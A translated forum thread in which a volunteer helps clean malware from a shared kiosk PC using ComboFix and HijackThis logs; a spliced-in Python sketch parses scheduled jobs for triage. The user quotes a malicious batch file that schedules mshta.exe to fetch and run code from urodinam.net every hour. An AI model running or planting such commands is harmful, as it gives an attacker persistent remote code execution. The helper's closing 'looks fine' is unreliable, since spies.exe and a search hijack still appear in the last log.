FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava12.dll
FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava13.dll
FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava14.dll
FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava32.dll
FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJPI150_11.dll
FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPOJI610.dll
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
.
- - - - TOMME PEKERE FJERNET - - - -

AddRemove-HijackThis - c:\documents and settings\kiosk\Mine dokumenter\Downloads\HijackThis.exe

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-10-26 16:26
Windows 5.1.2600 Service Pack 3 NTFS

skanner skjulte prosesser ...

skanner skjulte autostart-oppføringer ...

skanner skjulte filer ...

skanning vellykket
skjulte filer: 0

**************************************************************************
.
--------------------- DLL'er Lastet Av Kjørende Prosesser ---------------------

- - - - - - - > 'explorer.exe'(3032)
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Andre Kjørende Prosesser ------------------------
.
c:\epoagent\Common Framework\FrameworkService.exe
c:\programfiler\McAfee\VirusScan Enterprise\Mcshield.exe
c:\programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe
c:\epoagent\Common Framework\naPrdMgr.exe
c:\programfiler\UPHClean\uphclean.exe
c:\combofix\CF6590.exe
c:\epoagent\Common Framework\McTray.exe
c:\windows\System32\rundll32.exe
c:\documents and settings\kiosk\Mine dokumenter\Programfiler\Opera10usb\OperaUSB.exe
c:\windows\system32\notepad.exe
c:\combofix\PEV.cfxxe
.
**************************************************************************
.
Tidspunkt ferdig: 2009-10-26 16:35 - maskinen ble startet på nytt
ComboFix-quarantined-files.txt 2009-10-26 15:35

Pre-Run: 26 628 726 784 byte ledig
Post-Run: 26 723 725 312 byte ledig

WindowsXP-KB310994-SP2-Pro-BootDisk-NOR.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

- - End Of File - - D798A1F723363DD1D4EF2A7107CB2759

How does it look?

MBAM was a lovely program, by the way. Will be installed on my personal machine.

Thanks for the help

Edited 26 October 2009 by Bl4cKnD

norbat, posted 26 October 2009

This looks fine. Do you know the file C:\nAi.bat? If not, you can right-click it and choose Edit to see what it contains.

You can uninstall ComboFix by typing combofix /uninstall in the Run box (Start -> Run). This will also reset System Restore so that you don't get reinfected by a possible restore later.

hlnd (author), posted 26 October 2009 (edited)

Contents:

@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 01:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 02:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 03:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 04:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 05:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 06:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 07:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 08:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 09:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 10:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 11:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 12:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 13:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 14:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 15:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 16:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 17:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 18:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 19:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 20:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 21:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 22:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 23:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
exit

Delete...? (No, this is not something I recognise)

Edited 26 October 2009 by Bl4cKnD

norbat, posted 26 October 2009

Yes, delete it. The file belongs to the infection that MBAM removed.
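
A triage sketch for the batch file posted above, added here as an example and not code from the thread or from any of the tools it mentions: it lists the at jobs such a script registers and flags those that start a script host such as mshta.exe with a remote URL. The function names are hypothetical, and the sample is a constructed excerpt of the posted file plus one constructed benign job for contrast.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the first lines of the batch file quoted in the thread,
# plus one constructed benign backup job (not from the thread) for contrast.
SAMPLE_BAT = r"""@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 01:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236
at 13:00 /every:F cmd /c "C:\backup\run.bat"
exit
"""

# at [\\computer] time [/interactive] [/every:days | /next:days] command
AT_RE = re.compile(
    r'^\s*at\s+(?:\\\\\S+\s+)?(?P<time>\d{1,2}:\d{2})'
    r'(?P<opts>(?:\s+/\S+)*)\s+(?P<cmd>\S.*?)\s*$',
    re.IGNORECASE,
)
URL_RE = re.compile(r'\b(?:https?|ftp)://[^\s"\'<>]+', re.IGNORECASE)
# Windows script hosts that will fetch and run content named on the command line.
SCRIPT_HOSTS = {"mshta", "mshta.exe", "wscript", "wscript.exe",
                "cscript", "cscript.exe"}


def program_name(cmd):
    """Return the lower-cased base name of the first token of a command line."""
    m = re.match(r'"([^"]+)"|(\S+)', cmd)
    token = m.group(1) or m.group(2)
    return re.split(r'[\\/]', token)[-1].lower()


def parse_at_jobs(text):
    """Extract every scheduled job an 'at' line in the script would create."""
    jobs = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = AT_RE.match(line)
        if not m:
            continue  # 'at /delete' and non-at lines carry no start time
        every = []
        for opt in m.group("opts").split():
            if opt.lower().startswith("/every:"):
                every = opt[len("/every:"):].split(",")
        cmd = m.group("cmd")
        jobs.append({
            "line_no": line_no,
            "time": m.group("time"),
            "every": every,
            "program": program_name(cmd),
            "urls": URL_RE.findall(cmd),
        })
    return jobs


def defang(url):
    """Make a URL safe to paste into a ticket or forum post."""
    host = urlsplit(url).hostname or ""
    out = url.replace("http", "hxxp", 1)
    return out.replace(host, host.replace(".", "[.]"), 1) if host else out


def triage(text):
    """Summarise what the script schedules and which jobs look hostile."""
    jobs = parse_at_jobs(text)
    suspicious = [j for j in jobs
                  if j["program"] in SCRIPT_HOSTS and j["urls"]]
    hosts = sorted({urlsplit(u).hostname
                    for j in suspicious for u in j["urls"]
                    if urlsplit(u).hostname})
    flags = re.IGNORECASE | re.MULTILINE
    return {
        "jobs": jobs,
        "suspicious": suspicious,
        "hosts": hosts,
        # The script forces the Task Scheduler service on before adding jobs.
        "enables_scheduler": bool(
            re.search(r'^\s*sc\s+config\s+schedule\s+start=\s*auto', text, flags)),
        # It also wipes any existing at jobs first.
        "clears_existing_jobs": bool(
            re.search(r'^\s*at\s+/delete\b', text, flags)),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_BAT)
    for job in report["suspicious"]:
        print(job["line_no"], job["time"], job["program"],
              [defang(u) for u in job["urls"]])
    print("hosts:", report["hosts"])
```

Deleting the batch file does not remove jobs it has already registered; running at with no arguments lists what is still scheduled.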
hlnd (Author) Posted 26 October 2009
Deleted. New HJT log (if you can be bothered to check it to make sure everything is gone):

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 18:43:01, on 26.10.2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16915)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\windows\system32\cistub.exe
c:\epoagent\Common Framework\FrameworkService.exe
C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\Programfiler\UPHClean\uphclean.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe
C:\epoagent\Common Framework\UdaterUI.exe
C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE
c:\epoagent\Common Framework\McTray.exe
C:\Programfiler\Messenger\msmsgs.exe
C:\Programfiler\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\ProcessExplorer\procexp.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\msiexec.exe
C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\Opera10usb\OperaUSB.exe
C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\LiberKey\Apps\Asuite\LKrun.exe
C:\Documents and Settings\kiosk\Mine dokumenter\Downloads\spies.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koblinger
R3 - URLSearchHook: (no name) - - (no file)
O2 - BHO: Koblingshjelpeprogram for Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programfiler\Fellesfiler\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [CapaInstaller Info Center] "C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe" /autostart
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "c:\epoagent\Common Framework\UdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [shStatEXE] "C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programfiler\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [ikiosk33] C:\Programfiler\Internet Kiosk Pro\kiosk.exe run
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [DWQueuedReporting] "C:\PROGRA~1\FELLES~1\MICROS~1\DW\dwtrig20.exe" -t
O4 - HKCU\..\Run: [MSMSGS] "C:\Programfiler\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [Communicator] "C:\Programfiler\Microsoft Office Communicator\Communicator.exe" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: Oppslag - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programfiler\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programfiler\Messenger\msmsgs.exe
O9 - Extra button: QIP 2005 - {1EF681F7-A04B-4D6D-9012-A307CCA55610} - C:\Programfiler\QIP\qip.exe (file missing) (HKCU)
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/...can8/oscan8.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1221728141109
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = fifk.vgs.no
O17 - HKLM\Software\..\Telephony: DomainName = fifk.vgs.no
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = fifk.vgs.no
O23 - Service: CapaInstaller Agent Service (cistub) - CapaSystems A/S - c:\windows\system32\cistub.exe
O23 - Service: McAfee Framework Service (McAfeeFramework) - McAfee, Inc. - c:\epoagent\Common Framework\FrameworkService.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe
O23 - Service: McAfee Task Manager (McTaskManager) - McAfee, Inc. - C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe

-- End of file - 6520 bytes

Thanks for all the help.
norbat Posted 26 October 2009
Looks fine. Surf safely!
hlnd (Author) Posted 27 October 2009
Thanks for the help. By the way, I'd like to point out that I'm not the one responsible for a virus getting onto that machine. Unfortunately it's used by a lot of people who know nothing whatsoever about computers, and IE is the only browser that's meant to be used =/